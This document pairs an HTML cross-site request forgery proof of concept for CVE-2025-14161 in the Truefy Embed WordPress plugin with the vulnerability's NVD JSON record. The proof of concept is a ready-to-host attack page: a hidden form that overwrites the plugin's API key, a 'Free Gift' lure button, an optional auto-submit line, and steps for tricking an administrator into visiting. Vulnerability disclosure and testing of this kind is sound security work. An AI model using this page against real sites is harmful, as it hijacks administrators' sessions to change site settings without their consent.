CVE-2025-14161

<!-- CSRF PoC for CVE-2025-14161: Truefy Embed Plugin Settings Update --> <!-- This PoC demonstrates how an attacker can forge a settings update request --> <!DOCTYPE html> <html> <head> <title>CSRF Attack PoC - CVE-2025-14161</title> </head> <body> <h1>CSRF PoC for Truefy Embed Plugin</h1> <p>Click the button below to trigger the forged request:</p> <!-- Auto-submit form targeting the vulnerable endpoint --> <form id="csrfForm" action="http://target-site.com/wp-admin/admin-post.php" method="POST" style="display:none;"> <!-- Required hidden fields for WordPress admin-post handler --> <input type="hidden" name="action" value="truefy_embed_options_update"> <!-- Missing or bypassed nonce validation - attacker does not need valid nonce --> <input type="hidden" name="_wpnonce" value="attacker_ forged_or_missing"> <!-- Plugin settings that can be modified --> <input type="hidden" name="truefy_api_key" value="attacker_controlled_api_key"> <input type="hidden" name="truefy_embed_options[api_key]" value="malicious_key_123"> <input type="hidden" name="truefy_embed_options[settings_updated]" value="1"> <!-- Additional settings fields --> <input type="hidden" name="truefy_embed_options[enable_logging]" value="1"> <input type="hidden" name="truefy_embed_options[cache_duration]" value="0"> </form> <button type="button" onclick="document.getElementById('csrfForm').submit();">Click Here for Free Gift!</button> <script> // Auto-submit on page load (for more stealthy attack) // Uncomment the line below for automatic exploitation // window.onload = function() { document.getElementById('csrfForm').submit(); }; console.log('CSRF PoC loaded - waiting for user interaction'); </script> </body> </html> <!-- Usage: 1. Host this HTML file on attacker's server 2. Trick WordPress admin into visiting this page 3. When admin clicks the button (or page auto-submits), the forged request is sent 4. The request carries admin's valid session cookies 5. Server processes request without proper nonce validation 6. Attacker's malicious API key is saved to plugin settings Note: This PoC is for educational and security testing purposes only. -->

{"cve": {"id": "CVE-2025-14161", "sourceIdentifier": "[email protected]", "published": "2025-12-12T04:15:48.770", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Truefy Embed plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.1.0. This is due to missing nonce validation on the 'truefy_embed_options_update' settings update action. This makes it possible for unauthenticated attackers to update the plugin's settings, including the API key, via a forged request granted they can trick a site administrator into performing an action such as clicking on a link."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-352"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/truefy-embed/tags/1.1.0/truefy.php#L431", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/truefy-embed/trunk/truefy.php#L431", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/74ad664d-5cfa-481c-a318-30999c43e4ac?source=cve", "source": "[email protected]"}]}}